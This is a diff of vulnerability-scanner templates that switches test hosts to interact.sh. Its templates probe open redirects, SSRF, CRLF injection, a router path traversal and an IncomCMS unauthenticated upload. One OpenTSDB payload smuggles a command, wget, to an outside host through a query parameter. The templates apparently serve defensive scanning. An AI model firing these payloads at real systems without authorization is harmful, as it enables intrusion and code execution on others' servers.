- '{{BaseURL}}/index.php?redirect=//evil.com'
|
- '{{BaseURL}}/index.php?redirect=//interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/04
|
# Enhanced by mp on 2022/05/04
|
||||||
|
|
|
@ -20,12 +20,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/'
|
- '{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/04
|
# Enhanced by mp on 2022/05/04
|
||||||
|
|
|
@ -30,7 +30,7 @@ requests:
|
||||||
"upstream":{
|
"upstream":{
|
||||||
"type":"roundrobin",
|
"type":"roundrobin",
|
||||||
"nodes":{
|
"nodes":{
|
||||||
"example.com:80":1
|
"interact.sh:80":1
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
@ -28,7 +28,7 @@ requests:
|
||||||
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
|
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
|
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
|
@ -36,4 +36,4 @@ requests:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -19,10 +19,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
|
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -19,10 +19,10 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/?url=http://example.com'
|
- '{{BaseURL}}/?url=http://interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
|
|
@ -17,14 +17,14 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com'
|
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
- "Location: https://example.com"
|
- "Location: https://interact.sh"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2020-29597
|
||||||
|
info:
|
||||||
|
name: IncomCMS 2.0 - Arbitary files upload
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
IncomCMS 2.0 has a modules/uploader/showcase/script.php insecure file upload vulnerability. This vulnerability allows unauthenticated attackers to upload files into the server.
|
||||||
|
reference:
|
||||||
|
- https://github.com/Trhackno/CVE-2020-29597
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29597
|
||||||
|
- https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
|
||||||
|
- https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2020-29597
|
||||||
|
cwe-id: CWE-434
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
tags: cve,cve2020,incomcms,fileupload,intrusive
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /incom/modules/uploader/showcase/script.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt
|
||||||
|
|
||||||
|
------WebKitFormBoundaryBEJZt0IK73M2mAbt
|
||||||
|
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.png"
|
||||||
|
Content-Type: image/png
|
||||||
|
|
||||||
|
|
||||||
|
------WebKitFormBoundaryBEJZt0IK73M2mAbt--
|
||||||
|
- |
|
||||||
|
GET /upload/userfiles/image/{{randstr}}.png HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- contains(body_1, '\"name\":\"{{randstr}}.png\"')
|
||||||
|
- status_code_2 == 200
|
||||||
|
condition: and
|
|
@ -18,7 +18,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
|
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -22,10 +22,10 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
|
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -3,7 +3,7 @@ id: CVE-2021-20090
|
||||||
info:
|
info:
|
||||||
name: Buffalo WSR-2533DHPL2 - Path Traversal
|
name: Buffalo WSR-2533DHPL2 - Path Traversal
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: high
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
|
Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
|
||||||
reference:
|
reference:
|
||||||
|
@ -11,8 +11,8 @@ info:
|
||||||
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.6
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2021-20090
|
cve-id: CVE-2021-20090
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2021,lfi,buffalo,firmware,iot,cisa
|
tags: cve,cve2021,lfi,buffalo,firmware,iot,cisa
|
||||||
|
|
|
@ -21,7 +21,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/adminer?elastic=example.com&username="
|
- "{{BaseURL}}/adminer?elastic=interact.sh&username="
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -28,7 +28,7 @@ requests:
|
||||||
"user_login":"{{randstr}}",
|
"user_login":"{{randstr}}",
|
||||||
"password":"{{randstr}}",
|
"password":"{{randstr}}",
|
||||||
"user_name":"{{randstr}}",
|
"user_name":"{{randstr}}",
|
||||||
"user_email":"{{randstr}}@example.com"
|
"user_email":"{{randstr}}@interact.sh"
|
||||||
}
|
}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
|
|
@ -23,7 +23,7 @@ requests:
|
||||||
- |
|
- |
|
||||||
GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
|
GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Referer: http://evil.com/127.0.0.1.html
|
Referer: http://interact.sh/127.0.0.1.html
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -31,4 +31,4 @@ requests:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<title>Example Domain</title>"
|
- "<h1> Interactsh Server </h1>"
|
||||||
|
|
|
@ -20,12 +20,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com"
|
- "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh"
|
||||||
- "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com"
|
- "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh"
|
||||||
- "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com"
|
- "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh"
|
||||||
- "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com"
|
- "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh"
|
||||||
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
|
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh"
|
||||||
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
|
- "{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
redirects: true
|
redirects: true
|
||||||
|
@ -37,5 +37,5 @@ requests:
|
||||||
- 200
|
- 200
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<title>Example Domain</title>"
|
- "<h1> Interactsh Server </h1>"
|
||||||
part: body
|
part: body
|
||||||
|
|
|
@ -22,10 +22,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com"
|
- "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -18,10 +18,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
|
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -23,7 +23,7 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1
|
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
redirects: true
|
redirects: true
|
||||||
|
@ -31,7 +31,7 @@ requests:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
|
@ -19,12 +19,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/"
|
- "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/13
|
# Enhanced by mp on 2022/04/13
|
||||||
|
|
|
@ -19,14 +19,14 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
|
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -19,12 +19,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com"
|
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/13
|
# Enhanced by mp on 2022/04/13
|
||||||
|
|
|
@ -19,12 +19,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com"
|
- "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/13
|
# Enhanced by mp on 2022/04/13
|
||||||
|
|
|
@ -18,12 +18,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com"
|
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/21
|
# Enhanced by mp on 2022/04/21
|
||||||
|
|
|
@ -17,10 +17,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com"
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -19,7 +19,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
|
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -32,7 +32,7 @@ requests:
|
||||||
words:
|
words:
|
||||||
- "Content-Disposition: attachment;filename=test.txt"
|
- "Content-Disposition: attachment;filename=test.txt"
|
||||||
- "Set-Cookie:CRLFInjection=Test"
|
- "Set-Cookie:CRLFInjection=Test"
|
||||||
- "Location: example.com"
|
- "Location: interact.sh"
|
||||||
- "X-XSS-Protection:0"
|
- "X-XSS-Protection:0"
|
||||||
part: header
|
part: header
|
||||||
condition: and
|
condition: and
|
||||||
|
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2021-27748
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IBM WebSphere Portal SSRF
|
||||||
|
author: pdteam
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
A Server Side Request Forgery vulnerability affects HCL Digital Experience, on-premise deployments and containers.
|
||||||
|
reference:
|
||||||
|
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
|
||||||
|
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2021-27748
|
||||||
|
tags: cve,cve2021,hcl,ibm,ssrf,websphere
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
|
||||||
|
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<h1> Interactsh Server </h1>"
|
|
@ -27,7 +27,7 @@ requests:
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
|
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept-Language: en
|
Accept-Language: en
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
|
@ -19,10 +19,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/new/newhttp://example.com"
|
- "{{BaseURL}}/new/newhttp://interact.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -6,7 +6,7 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
|
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
|
||||||
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
|
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
|
||||||
will pass FS's relative URL check however many browsers will gladly convert this to http://example.com.
|
will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
|
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
|
||||||
- https://github.com/Flask-Middleware/flask-security/issues/486
|
- https://github.com/Flask-Middleware/flask-security/issues/486
|
||||||
|
@ -21,10 +21,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/login?next=\\\example.com'
|
- '{{BaseURL}}/login?next=\\\interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
